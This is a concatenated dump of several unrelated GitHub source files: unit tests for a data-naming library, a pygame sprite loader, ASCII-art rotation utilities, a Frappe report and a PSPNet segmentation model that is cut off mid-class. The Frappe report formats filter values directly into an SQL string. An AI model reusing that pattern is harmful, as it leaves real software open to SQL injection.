pytest\n\nfrom datashuttle.configs.canonical_tags import tags\nfrom datashuttle.utils import formatting, utils\n\n\nclass TestUnit:\n \"\"\"\n Currently contains misc. unit tests.\n \"\"\"\n\n @pytest.mark.parametrize(\n \"underscore_position\", [\"left\", \"right\", \"both\", \"none\"]\n )\n @pytest.mark.parametrize(\n \"key\", [tags(\"date\"), tags(\"time\"), tags(\"datetime\")]\n )\n def test_datetime_string_replacement(self, key, underscore_position):\n \"\"\"\n Test the function that replaces @DATE, @TIME@ or @DATETIME@\n keywords with the date / time / datetime. Also, it will\n pre/append underscores to the tags if they are not\n already there (e.g if user input \"sub-001@DATE\").\n \"\"\"\n start = \"sub-001\"\n end = \"other-tag\"\n name = self.make_name(key, underscore_position, start, end)\n\n if key == tags(\"date\"):\n regex = re.compile(rf\"{start}_date-\\d\\d\\d\\d\\d\\d\\d\\d_{end}\")\n elif key == tags(\"time\"):\n regex = re.compile(rf\"{start}_time-\\d\\d\\d\\d\\d\\d_{end}\")\n elif key == tags(\"datetime\"):\n regex = re.compile(\n rf\"{start}_date-\\d\\d\\d\\d\\d\\d\\d\\d_time-\\d\\d\\d\\d\\d\\d_{end}\"\n )\n\n name_list = [name]\n formatting.update_names_with_datetime(name_list)\n\n assert re.search(regex, name_list[0]) is not None\n\n @pytest.mark.parametrize(\n \"prefix_and_names\",\n [\n [\"sub\", \"sub 001\"],\n [\"sub\", [\"sub 001\"]],\n [\"ses\", [\"ses- 001\", \"ses-002\"]],\n ],\n )\n def test_spaces_in_format_names(self, prefix_and_names):\n prefix, names = prefix_and_names\n with pytest.raises(BaseException) as e:\n formatting.format_names(names, prefix)\n\n assert str(e.value) == \"sub or ses names cannot include spaces.\"\n\n @pytest.mark.parametrize(\"prefix\", [\"sub\", \"ses\"])\n def test_process_to_keyword_in_sub_input(self, prefix):\n \"\"\" \"\"\"\n results = formatting.update_names_with_range_to_flag(\n [f\"{prefix}-001\", f\"{prefix}-01{tags('to')}123\"], prefix\n )\n assert results == [f\"{prefix}-001\"] + [\n f\"{prefix}-{str(num).zfill(2)}\" for num in range(1, 124)\n ]\n\n results = formatting.update_names_with_range_to_flag(\n [f\"{prefix}-1{tags('to')}3_hello-world\"], prefix\n )\n assert results == [\n f\"{prefix}-1_hello-world\",\n f\"{prefix}-2_hello-world\",\n f\"{prefix}-3_hello-world\",\n ]\n\n results = formatting.update_names_with_range_to_flag(\n [\n f\"{prefix}-01{tags('to')}3_hello\",\n f\"{prefix}-4{tags('to')}005_goodbye\",\n f\"{prefix}-006{tags('to')}0007_hello\",\n ],\n prefix,\n )\n\n assert results == [\n f\"{prefix}-01_hello\",\n 
f\"{prefix}-02_hello\",\n f\"{prefix}-03_hello\",\n f\"{prefix}-004_goodbye\",\n f\"{prefix}-005_goodbye\",\n f\"{prefix}-0006_hello\",\n f\"{prefix}-0007_hello\",\n ]\n\n @pytest.mark.parametrize(\"prefix\", [\"sub\", \"ses\"])\n @pytest.mark.parametrize(\n \"bad_input\",\n [\n f\"1{tags('to')}2\",\n f\"prefix-1{tags('to')}_date\",\n f\"prefix-@01{tags('to')}02\",\n f\"prefix-01{tags('to')}1M1\",\n ],\n )\n def test_process_to_keyword_bad_input_raises_error(\n self, prefix, bad_input\n ):\n bad_input = bad_input.replace(\"prefix\", prefix)\n\n with pytest.raises(BaseException) as e:\n formatting.update_names_with_range_to_flag([bad_input], prefix)\n\n assert (\n str(e.value)\n == f\"The name: {bad_input} is not in required format for {tags('to')} keyword. \"\n f\"The start must be be {prefix}-{tags('to')}).\"\n )\n\n def test_formatting_check_dashes_and_underscore_alternate_correctly(self):\n \"\"\"\"\"\"\n all_names = [\"sub_001_date-010101\"]\n with pytest.raises(BaseException) as e:\n formatting.check_dashes_and_underscore_alternate_correctly(\n all_names\n )\n\n assert (\n str(e.value)\n == \"The first delimiter of 'sub' or 'ses' must be dash not underscore e.g. sub-001.\"\n )\n\n alternate_error = (\n \"Subject and session names must contain alternating dashes\"\n \" and underscores (used for separating key-value pairs).\"\n )\n\n all_names = [\"sub-001-date_101010\"]\n with pytest.raises(BaseException) as e:\n formatting.check_dashes_and_underscore_alternate_correctly(\n all_names\n )\n\n assert str(e.value) == alternate_error\n\n all_names = [\"sub-001_ses-002-suffix\"]\n with pytest.raises(BaseException) as e:\n formatting.check_dashes_and_underscore_alternate_correctly(\n all_names\n )\n assert str(e.value) == alternate_error\n\n all_names = [\"sub-001_ses-002-task-check\"]\n with pytest.raises(BaseException) as e:\n formatting.check_dashes_and_underscore_alternate_correctly(\n all_names\n )\n assert str(e.value) == alternate_error\n\n # check these don't raise\n all_names = [\"ses-001_hello-world_one-hundred\"]\n formatting.check_dashes_and_underscore_alternate_correctly(all_names)\n\n all_names = [\"ses-001_hello-world_suffix\"]\n formatting.check_dashes_and_underscore_alternate_correctly(all_names)\n\n def test_get_value_from_bids_name_regexp(self):\n \"\"\"\n Test the regexp that finds the value from a BIDS-name\n key-value pair.\n \"\"\"\n bids_name = \"sub-0123125_ses-11312_datetime-5345323_id-3asd@523\"\n\n sub = utils.get_value_from_key_regexp(bids_name, \"sub\")[0]\n assert sub == \"0123125\"\n\n ses = utils.get_value_from_key_regexp(bids_name, \"ses\")[0]\n assert ses == \"11312\"\n\n datetime = utils.get_value_from_key_regexp(bids_name, \"datetime\")[0]\n assert datetime == \"5345323\"\n\n id = utils.get_value_from_key_regexp(bids_name, \"id\")[0]\n assert id == \"3asd@523\"\n\n # ----------------------------------------------------------------------\n # Utlis\n # ----------------------------------------------------------------------\n\n def make_name(self, key, underscore_position, start, end):\n \"\"\"\n Make name with / without underscore to test every\n possibility.\n \"\"\"\n if underscore_position == \"left\":\n name = f\"{start}_{key}{end}\"\n\n elif underscore_position == \"right\":\n name = f\"{start}{key}_{end}\"\n\n elif underscore_position == \"both\":\n name = f\"{start}_{key}_{end}\"\n\n elif underscore_position == \"none\":\n name = f\"{start}{key}{end}\"\n\n return 
name\n","repo_name":"neuroinformatics-unit/datashuttle","sub_path":"tests/tests_unit/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":6936,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"20839850756","text":"from pygame import Surface, error, image, SRCALPHA, RLEACCEL\nfrom os.path import join\nfrom rendering.constants import IMAGE_RESOURCE, TILE_SIZE, ARENA_SURFACE_PADDING\nfrom pygame import transform\nfrom pygame import PixelArray\nfrom rendering.constants import REPLACEMENT_COLOR_LIGHT, REPLACEMENT_COLOR_DARK, COLOR_PLAYERS, COLOR_PLAYERS_DARK\nfrom pygame.gfxdraw import aaellipse, filled_ellipse\n\nRESOURCE_TILE_SIZE = 128\n\n\ndef load(path: str) -> Surface:\n try:\n img = image.load_extended(join('assets/sprites', path + \".png\"))\n except error:\n raise SystemExit(\"Could not load image from {}\".format(path))\n\n return img\n\n\ndef put_values_for_entity(block: dict, name: str, alliance: int):\n resource = load(block[name + \"_generic\"][\"name\"])\n PixelArray(resource).replace(REPLACEMENT_COLOR_LIGHT, COLOR_PLAYERS[alliance], 0)\n PixelArray(resource).replace(REPLACEMENT_COLOR_DARK, COLOR_PLAYERS_DARK[alliance], 0)\n for x in range(4):\n for y in range(4):\n if x == 3 and y == 1:\n state = \"state_stand\"\n elif y == 0:\n state = \"state_walk\"\n elif y == 1:\n state = \"state_attack\"\n elif y == 2:\n state = \"state_growing\"\n elif y == 3:\n state = \"state_die\"\n\n if state == \"state_stand\":\n source_size = (RESOURCE_TILE_SIZE, RESOURCE_TILE_SIZE)\n srf_size = (TILE_SIZE, TILE_SIZE)\n source = Surface(source_size, SRCALPHA)\n srf = Surface(srf_size, SRCALPHA)\n source.blit(resource, (0, 0), ((RESOURCE_TILE_SIZE * x, RESOURCE_TILE_SIZE * y), source_size))\n transform.scale(source, (TILE_SIZE, TILE_SIZE), srf)\n\n block[name + str(alliance)][state][\"left\"][\"frame0\"] = srf\n block[name + str(alliance)][\"state_attack\"][\"left\"][\"frame\" + str(x)] = srf\n\n srf = transform.flip(srf, True, False)\n block[name + str(alliance)][state][\"right\"][\"frame0\"] = srf\n block[name + str(alliance)][\"state_attack\"][\"right\"][\"frame\" + str(x)] = srf\n\n block[name + \"_generic\"][\"offset\"] = (TILE_SIZE / -2, -TILE_SIZE)\n else:\n source_size = (RESOURCE_TILE_SIZE, RESOURCE_TILE_SIZE)\n srf_size = (TILE_SIZE, TILE_SIZE)\n source = Surface(source_size, SRCALPHA)\n srf = Surface(srf_size, SRCALPHA)\n source.blit(resource, (0, 0), ((RESOURCE_TILE_SIZE * x, RESOURCE_TILE_SIZE * y), source_size))\n transform.scale(source, (TILE_SIZE, TILE_SIZE), srf)\n\n block[name + str(alliance)][state][\"left\"][\"frame\" + str(x)] = srf\n\n srf = transform.flip(srf, True, False)\n block[name + str(alliance)][state][\"right\"][\"frame\" + str(x)] = srf\n\n\ndef load_pea(block: dict, alliance: int):\n resource = load(block[\"pea_generic\"][\"name\"])\n srf = Surface((TILE_SIZE / 2, TILE_SIZE / 2), SRCALPHA)\n transform.scale(resource, (TILE_SIZE // 2, TILE_SIZE // 2), srf)\n PixelArray(srf).replace(REPLACEMENT_COLOR_LIGHT, COLOR_PLAYERS[alliance], 0)\n PixelArray(srf).replace(REPLACEMENT_COLOR_DARK, COLOR_PLAYERS_DARK[alliance], 0)\n\n block[\"pea\" + str(alliance)][\"resource\"] = srf\n\n block[\"pea_generic\"][\"offset\"] = (TILE_SIZE / -2 + TILE_SIZE / 4, -TILE_SIZE)\n\n\ndef load_ui(block: dict):\n img = load(\"carrotUI\")\n img = img.convert_alpha(img)\n size = int(ARENA_SURFACE_PADDING[0] / 3), int(ARENA_SURFACE_PADDING[0] / 3)\n srf = Surface(size, SRCALPHA)\n transform.scale(img, size, srf)\n 
block[\"melee\"][\"resource\"] = srf\n\n img = load(\"peaUI\")\n img = img.convert_alpha(img)\n srf = Surface(size, SRCALPHA)\n transform.scale(img, size, srf)\n block[\"ranged\"][\"resource\"] = srf\n\n\ndef generate_shadows(block: dict):\n block[\"offset\"] = (TILE_SIZE / -2, TILE_SIZE / -4)\n\n x = int(TILE_SIZE / 4)\n y = int(TILE_SIZE / 8)\n\n srf = Surface((TILE_SIZE, int(TILE_SIZE / 2)), SRCALPHA)\n filled_ellipse(srf, x * 2, y * 2, x, y, COLOR_PLAYERS_DARK[0])\n block[\"0\"] = srf\n\n srf = Surface((TILE_SIZE, int(TILE_SIZE / 2)), SRCALPHA)\n filled_ellipse(srf, x * 2, y * 2, x, y, COLOR_PLAYERS_DARK[1])\n block[\"1\"] = srf\n\n srf = Surface((TILE_SIZE, int(TILE_SIZE / 2)), SRCALPHA)\n filled_ellipse(srf, x * 2, y * 2, x, y, COLOR_PLAYERS_DARK[2])\n block[\"2\"] = srf\n\n srf = Surface((TILE_SIZE, int(TILE_SIZE / 2)), SRCALPHA)\n filled_ellipse(srf, x * 2, y * 2, x, y, COLOR_PLAYERS_DARK[3])\n block[\"3\"] = srf\n\n\ndef load_all():\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"player\", 0)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"player\", 1)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"player\", 2)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"player\", 3)\n\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"carrot\", 0)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"carrot\", 1)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"carrot\", 2)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"carrot\", 3)\n\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"sprout\", 0)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"sprout\", 1)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"sprout\", 2)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"sprout\", 3)\n\n load_pea(IMAGE_RESOURCE[\"entities\"], 0)\n load_pea(IMAGE_RESOURCE[\"entities\"], 1)\n load_pea(IMAGE_RESOURCE[\"entities\"], 2)\n load_pea(IMAGE_RESOURCE[\"entities\"], 3)\n\n load_ui(IMAGE_RESOURCE[\"ui\"])\n\n generate_shadows(IMAGE_RESOURCE[\"juice\"][\"shadow\"])\n","repo_name":"AdronTech/CarrotWarfare","sub_path":"rendering/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":5689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37771956414","text":"#\n# \n# \n\nfrom functions.selectASCII import selectASCII\nfrom functions.printASCII import printASCII\nfrom functions.imports.loader import loadText\nfrom os import listdir, system\n\n\"\"\"\nFuncion para cargar a memoria los ASCII's predefinidos y los asigna a la variable\nASCIIdir para su uso y modificacion.\n\"\"\"\ndef loadToMemory():\n return {txt: loadText(\"Assets/\" + txt) for txt in listdir(\"Assets\") if not txt.startswith(\"#\")}\nASCIIdir = loadToMemory()\n\n\"\"\"\nshowASCII llama a la funcion selectASCII, la cual retorna un ASCII Art\nen formato matriz. <-- TODAS LAS FUNCIONES HACEN ESTO\nLuego se llama a la funcion printASCII, la cual imprime el ASCII para\nsu visualizacion.\n\"\"\"\ndef showASCII():\n ascii = selectASCII(ASCIIdir)\n printASCII(ascii)\n\n\n\"\"\"\nRota la matriz 90° horario conteniendo el ASCII Art siguiendo la siguiente logica:\n- Todo elemento del mismo indice de columna (izq. 
a der.), se convierte\n en fila (descendente).\n\"\"\"\ndef rotate90():\n ascii = selectASCII(ASCIIdir)\n new_ascii = list()\n\n for row in range(0, len(ascii[0])-1, 1):\n newRow = []\n for col in range(len(ascii)-1, -1, -1):\n newRow.append(ascii[col][row])\n new_ascii.append(newRow)\n\n printASCII(new_ascii)\n return new_ascii\n\n\n\"\"\"\nRota la matriz 90° anti-horario siguiendo la misma logica del horario,\nsolo que se invierten los steps para obtener el resultado anti-horario.\n\"\"\"\ndef rotate90Anti():\n ascii = selectASCII(ASCIIdir)\n new_ascii = list()\n\n for row in range(len(ascii[0])-1, -1, -1):\n newRow = []\n for col in range(0, len(ascii)-1, 1):\n newRow.append(ascii[col][row])\n new_ascii.append(newRow)\n\n printASCII(new_ascii)\n return new_ascii\n\n\n\"\"\"\nRota la matriz 180° horario conteniendo el ASCII Art siguiendo la siguiente logica:\n- Cada fila (ascendente) se vuelve su orden opuesto (ej: matriz[0] -> matriz[-1]),\n pero sus elementos se invierten de orden.\n\"\"\"\ndef rotate180():\n ascii = selectASCII(ASCIIdir)\n new_ascii = list()\n\n for row in range(len(ascii)-1,-1,-1):\n newRow = []\n for col in range(len(ascii[row])-1,-1,-1):\n newRow.append(ascii[row][col])\n new_ascii.append(newRow)\n\n printASCII(new_ascii)\n return new_ascii\n\n\n\"\"\"\nRotar 180° de forma horaria o anti-horaria resulta en la misma imagen.\n\"\"\"\ndef rotate180Anti():\n ascii = selectASCII(ASCIIdir)\n new_ascii = list()\n\n for row in range(len(ascii)-1,-1,-1):\n newRow = []\n for col in range(len(ascii[row])-1,-1,-1):\n newRow.append(ascii[row][col])\n new_ascii.append(newRow)\n\n printASCII(new_ascii)\n return new_ascii\n\n\n\"\"\"\nItera sobre los caracteres de la matriz y crea un diccionario para\nllevar la cuenta de cada uno.\n\"\"\"\ndef frecChars():\n ascii = selectASCII(ASCIIdir)\n charsDic = {}\n\n for row in ascii:\n for x in row:\n if x in charsDic:\n charsDic[x] += 1\n else:\n charsDic[x] = 1\n\n print(\"%-10s | %10s\" % (\"Caracter\",\"Frecuencia\"))\n print(\"¯\" * 23)\n \n for key,value in charsDic.items():\n print(\"%-10s : %-s\" % (key,value))\n\n\n\"\"\"\nHace un efecto espejo al ASCII Art siguien la siguiente logica:\n- La matriz es la misma, pero los ordenes/indices de los elementos\n de cada fila se invierten.\n\"\"\"\ndef mirrorASCII():\n art = selectASCII(ASCIIdir)\n result=list()\n for y in range(len(art)):\n linea=list()\n for x in range(len(art[0])-1, -1,-1):\n linea.append(art[y][x])\n result.append(linea)\n \n printASCII(result)\n return result\n\n\"\"\"\nPermite abrir un .txt de la carpeta \"Customs\" y la almacena en\nmemoria para su posterior uso dentro del programa.\n\"\"\"\ndef readTxt():\n while True:\n try:\n name = input(\"Nombre del archivo: \")\n ascii = loadText(\"Customs/\" + name)\n ASCIIdir[name] = ascii\n print()\n printASCII(ascii)\n except IOError:\n print(\"Archivo no encontrado...\")\n continue\n break\n\n\"\"\"\nFuncion que contiene un sub-menu para poder seleccionar un ASCII en memoria, modificarlo\ny guardar la modificacion como un nuevo .txt en ./Customs.\n\"\"\"\ndef saveTxt():\n def clear():\n system(\"cls\")\n\n def saveMenu():\n print(\"=\"*100)\n print(\"[1] Rotar 90 grados en sentido horario\")\n print(\"[2] Rotar 90 grados en sentido anti-horario\")\n print(\"[3] Rotar 180 grados en sentido horario\")\n print(\"[4] Rotar 180 grados en sentido anti-horario\")\n print(\"[5] Efecto espejo\")\n print(\"=\"*100)\n \n def save(m):\n ask = \"\\nIngrese nombre para guardar (.txt): \"\n with open(\"Customs/\" + input(ask), \"w\", 
encoding=\"utf8\") as f:\n for row in m:\n row = \"\\n\" + \"\".join(row)\n f.write(row)\n\n while True:\n saveMenu()\n try:\n opcion = int(input(\"\\nIngrese su opcion: \"))\n except ValueError:\n clear()\n continue\n if opcion == 1:\n clear()\n ascii = rotate90()\n save(ascii)\n break\n elif opcion == 2:\n clear()\n ascii = rotate90Anti()\n save(ascii)\n break\n elif opcion == 3:\n clear()\n ascii = rotate180()\n save(ascii)\n break\n elif opcion == 4:\n clear()\n ascii = rotate180Anti()\n save(ascii)\n break\n elif opcion == 5:\n clear()\n ascii = mirrorASCII()\n save(ascii)\n break\n else:\n print(\"Escoge una de las opciones...\")\n clear()\n continue\n\ndef titulo():\n f = open(\"Assets/#tittle.txt\", 'r', encoding=\"utf8\")\n print()\n print(''.join([line for line in f]))\n print(\"{:^100s}\".format(\"Grupo 4\"))\n f.close()","repo_name":"Adrian-Cespedes/PROG-4.02---Proyecto-1-G4","sub_path":"src/funcHandler.py","file_name":"funcHandler.py","file_ext":"py","file_size_in_byte":5974,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7083392697","text":"from __future__ import unicode_literals\nimport frappe\nfrom frappe import _\n\ndef execute(filters=None):\n columns = get_columns(filters)\n data = get_data(filters)\n return columns, data\n\ndef get_columns(filters):\n columns = [\n {\"label\": _(\"Drilling Move Log\"), \"fieldname\": \"log\", \"fieldtype\": \"Link\", \"options\": \"Drilling Move Log\", \"width\": 140},\n {\"label\": _(\"Project\"), \"fieldname\": \"project\", \"fieldtype\": \"Link\", \"options\": \"Project\", \"width\": 100},\n {\"label\": _(\"Subproject\"), \"fieldname\": \"subproject\", \"fieldtype\": \"Link\", \"options\": \"Subcontracting Order\", \"width\": 100},\n {\"label\": _(\"Start Date\"), \"fieldname\": \"start_date\", \"fieldtype\": \"Date\", \"width\": 100},\n {\"label\": _(\"End Date\"), \"fieldname\": \"end_date\", \"fieldtype\": \"Date\", \"width\": 100},\n {\"label\": _(\"Team\"), \"fieldname\": \"drilling_team\", \"fieldtype\": \"Link\", \"options\": \"Drilling Team\", \"width\": 150}\n ]\n return columns\n \ndef get_data(filters):\n project_filter = \"\"\n if filters.project:\n project_filter = \"\"\" AND `dmlp`.`project` = \"{0}\" \"\"\".format(filters.project)\n \n projects = frappe.db.sql(\"\"\"\n SELECT\n `dmlp`.`project` AS `project`,\n `dml`.`name` AS `log`,\n `dml`.`date` AS `date`\n FROM `tabDrilling Move Log Project` AS `dmlp`\n LEFT JOIN `tabDrilling Move Log` AS `dml` ON `dml`.`name` = `dmlp`.`parent`\n WHERE\n `dml`.`date` BETWEEN \"{from_date}\" AND \"{to_date}\"\n {project_filter}\n ORDER BY `dml`.`date` DESC, `dml`.`creation` DESC;\n \"\"\".format(from_date=filters.from_date, to_date=filters.to_date, project_filter=project_filter),\n as_dict=True)\n \n data = []\n last_log = None\n for p in projects:\n # check/add log heading\n if p['log'] != last_log:\n data.append({\n 'log': p['log'],\n 'indent': 0\n })\n last_log = p['log']\n # add project row\n project_doc = frappe.get_doc(\"Project\", p['project'])\n data.append({\n 'log': p['log'],\n 'project': p['project'],\n 'indent': 1,\n 'start_date': project_doc.expected_start_date,\n 'end_date': project_doc.expected_end_date,\n 'drilling_team': project_doc.drilling_team\n })\n \n # add subprojects\n for s in project_doc.subprojects:\n data.append({\n 'log': p['log'],\n 'project': p['project'],\n 'subproject': s.subcontracting_order,\n 'indent': 2,\n 'start_date': s.start,\n 'end_date': s.end,\n 'drilling_team': s.team\n })\n 
return data\n","repo_name":"libracore/hb","sub_path":"heimbohrtechnik/heim_bohrtechnik/report/impact_analysis/impact_analysis.py","file_name":"impact_analysis.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27640671186","text":"# パッケージのimport\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass PSPNet(nn.Module):\n def __init__(self, n_classes):\n super(PSPNet, self).__init__()\n\n # パラメータ設定\n block_config = [3, 4, 6, 3] # resnet50\n img_size = 475\n img_size_8 = 60 # img_sizeの1/8に\n\n # 4つのモジュールを構成するサブネットワークの用意\n self.feature_conv = FeatureMap_convolution()\n self.feature_res_1 = ResidualBlockPSP(\n n_blocks=block_config[0], in_channels=128, mid_channels=64, out_channels=256, stride=1, dilation=1)\n self.feature_res_2 = ResidualBlockPSP(\n n_blocks=block_config[1], in_channels=256, mid_channels=128, out_channels=512, stride=2, dilation=1)\n self.feature_dilated_res_1 = ResidualBlockPSP(\n n_blocks=block_config[2], in_channels=512, mid_channels=256, out_channels=1024, stride=1, dilation=2)\n self.feature_dilated_res_2 = ResidualBlockPSP(\n n_blocks=block_config[3], in_channels=1024, mid_channels=512, out_channels=2048, stride=1, dilation=4)\n\n self.pyramid_pooling = PyramidPooling(in_channels=2048, pool_sizes=[\n 6, 3, 2, 1], height=img_size_8, width=img_size_8)\n\n self.decode_feature = DecodePSPFeature(\n height=img_size, width=img_size, n_classes=n_classes)\n\n self.aux = AuxiliaryPSPlayers(\n in_channels=1024, height=img_size, width=img_size, n_classes=n_classes)\n\n def forward(self, x):\n x = self.feature_conv(x)\n x = self.feature_res_1(x)\n x = self.feature_res_2(x)\n x = self.feature_dilated_res_1(x)\n\n output_aux = self.aux(x) # Featureモジュールの途中をAuxモジュールへ\n\n x = self.feature_dilated_res_2(x)\n\n x = self.pyramid_pooling(x)\n output = self.decode_feature(x)\n\n return (output, output_aux)\n\n\nclass conv2DBatchNormRelu(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride, padding, dilation, bias):\n super(conv2DBatchNormRelu, self).__init__()\n self.conv = nn.Conv2d(in_channels, out_channels,\n kernel_size, stride, padding, dilation, bias=bias)\n self.batchnorm = nn.BatchNorm2d(out_channels)\n self.relu = nn.ReLU(inplace=True)\n # inplase設定で入力を保存せずに出力を計算し、メモリ削減する\n\n def forward(self, x):\n x = self.conv(x)\n x = self.batchnorm(x)\n outputs = self.relu(x)\n\n return outputs\n\n\nclass FeatureMap_convolution(nn.Module):\n def __init__(self):\n '''構成するネットワークを用意'''\n super(FeatureMap_convolution, self).__init__()\n\n # 畳み込み層1\n in_channels, out_channels, kernel_size, stride, padding, dilation, bias = 3, 64, 3, 2, 1, 1, False\n self.cbnr_1 = conv2DBatchNormRelu(\n in_channels, out_channels, kernel_size, stride, padding, dilation, bias)\n\n # 畳み込み層2\n in_channels, out_channels, kernel_size, stride, padding, dilation, bias = 64, 64, 3, 1, 1, 1, False\n self.cbnr_2 = conv2DBatchNormRelu(\n in_channels, out_channels, kernel_size, stride, padding, dilation, bias)\n\n # 畳み込み層3\n in_channels, out_channels, kernel_size, stride, padding, dilation, bias = 64, 128, 3, 1, 1, 1, False\n self.cbnr_3 = conv2DBatchNormRelu(\n in_channels, out_channels, kernel_size, stride, padding, dilation, bias)\n\n # MaxPooling層\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n\n def forward(self, x):\n x = self.cbnr_1(x)\n x = self.cbnr_2(x)\n x = self.cbnr_3(x)\n outputs = self.maxpool(x)\n return outputs\n\n\nclass 
ResidualBlockPSP(nn.Sequential):\n def __init__(self, n_blocks, in_channels, mid_channels, out_channels, stride, dilation):\n super(ResidualBlockPSP, self).__init__()\n\n # bottleNeckPSPの用意\n self.add_module(\n \"block1\",\n bottleNeckPSP(in_channels, mid_channels,\n out_channels, stride, dilation)\n )\n\n # bottleNeckIdentifyPSPの繰り返しの用意\n for i in range(n_blocks - 1):\n self.add_module(\n \"block\" + str(i+2),\n bottleNeckIdentifyPSP(\n out_channels, mid_channels, stride, dilation)\n )\n\n\nclass conv2DBatchNorm(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride, padding, dilation, bias):\n super(conv2DBatchNorm, self).__init__()\n self.conv = nn.Conv2d(in_channels, out_channels,\n kernel_size, stride, padding, dilation, bias=bias)\n self.batchnorm = nn.BatchNorm2d(out_channels)\n\n def forward(self, x):\n x = self.conv(x)\n outputs = self.batchnorm(x)\n\n return outputs\n\n\nclass bottleNeckPSP(nn.Module):\n def __init__(self, in_channels, mid_channels, out_channels, stride, dilation):\n super(bottleNeckPSP, self).__init__()\n\n self.cbr_1 = conv2DBatchNormRelu(\n in_channels, mid_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False)\n self.cbr_2 = conv2DBatchNormRelu(\n mid_channels, mid_channels, kernel_size=3, stride=stride, padding=dilation, dilation=dilation, bias=False)\n self.cb_3 = conv2DBatchNorm(\n mid_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False)\n\n # スキップ結合\n self.cb_residual = conv2DBatchNorm(\n in_channels, out_channels, kernel_size=1, stride=stride, padding=0, dilation=1, bias=False)\n\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n conv = self.cb_3(self.cbr_2(self.cbr_1(x)))\n residual = self.cb_residual(x)\n return self.relu(conv + residual)\n\n\nclass bottleNeckIdentifyPSP(nn.Module):\n def __init__(self, in_channels, mid_channels, stride, dilation):\n super(bottleNeckIdentifyPSP, self).__init__()\n\n self.cbr_1 = conv2DBatchNormRelu(\n in_channels, mid_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False)\n self.cbr_2 = conv2DBatchNormRelu(\n mid_channels, mid_channels, kernel_size=3, stride=1, padding=dilation, dilation=dilation, bias=False)\n self.cb_3 = conv2DBatchNorm(\n mid_channels, in_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False)\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n conv = self.cb_3(self.cbr_2(self.cbr_1(x)))\n residual = x\n return self.relu(conv + residual)\n\n\nclass PyramidPooling(nn.Module):\n def __init__(self, in_channels, pool_sizes, height, width):\n super(PyramidPooling, self).__init__()\n\n # forwardで使用する画像サイズ\n self.height = height\n self.width = width\n\n # 各畳み込み層の出力チャネル数\n out_channels = int(in_channels / len(pool_sizes))\n\n # 各畳み込み層を作成\n # この実装方法は愚直すぎてfor文で書きたいところですが、分かりやすさを優先しています\n # pool_sizes: [6, 3, 2, 1]\n self.avpool_1 = nn.AdaptiveAvgPool2d(output_size=pool_sizes[0])\n self.cbr_1 = conv2DBatchNormRelu(\n in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False)\n\n self.avpool_2 = nn.AdaptiveAvgPool2d(output_size=pool_sizes[1])\n self.cbr_2 = conv2DBatchNormRelu(\n in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False)\n\n self.avpool_3 = nn.AdaptiveAvgPool2d(output_size=pool_sizes[2])\n self.cbr_3 = conv2DBatchNormRelu(\n in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False)\n\n self.avpool_4 = nn.AdaptiveAvgPool2d(output_size=pool_sizes[3])\n self.cbr_4 = conv2DBatchNormRelu(\n 
in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False)\n\n def forward(self, x):\n\n out1 = self.cbr_1(self.avpool_1(x))\n out1 = F.interpolate(out1, size=(\n self.height, self.width), mode=\"bilinear\", align_corners=True)\n\n out2 = self.cbr_2(self.avpool_2(x))\n out2 = F.interpolate(out2, size=(\n self.height, self.width), mode=\"bilinear\", align_corners=True)\n\n out3 = self.cbr_3(self.avpool_3(x))\n out3 = F.interpolate(out3, size=(\n self.height, self.width), mode=\"bilinear\", align_corners=True)\n\n out4 = self.cbr_4(self.avpool_4(x))\n out4 = F.interpolate(out4, size=(\n self.height, self.width), mode=\"bilinear\", align_corners=True)\n\n # 最終的に結合させる、dim=1でチャネル数の次元で結合\n output = torch.cat([x, out1, out2, out3, out4], dim=1)\n\n return output\n\n\nclass DecodePSPFeature(nn.Module):\n def __init__(self, height, width, n_classes):\n super(DecodePSPFeature, self).__init__()\n\n # forwardで使用する画像サイズ\n self.height = height\n self.width = width\n\n self.cbr = conv2DBatchNormRelu(\n in_channels=4096, out_channels=512, kernel_size=3, stride=1, padding=1, dilation=1, bias=False)\n self.dropout = nn.Dropout2d(p=0.1)\n self.classification = nn.Conv2d(\n in_channels=512, out_channels=n_classes, kernel_size=1, stride=1, padding=0)\n\n def forward(self, x):\n x = self.cbr(x)\n x = self.dropout(x)\n x = self.classification(x)\n output = F.interpolate(\n x, size=(self.height, self.width), mode=\"bilinear\", align_corners=True)\n\n return output\n\n\nclass AuxiliaryPSPlayers(nn.Module):\n def __init__(self, in_channels, 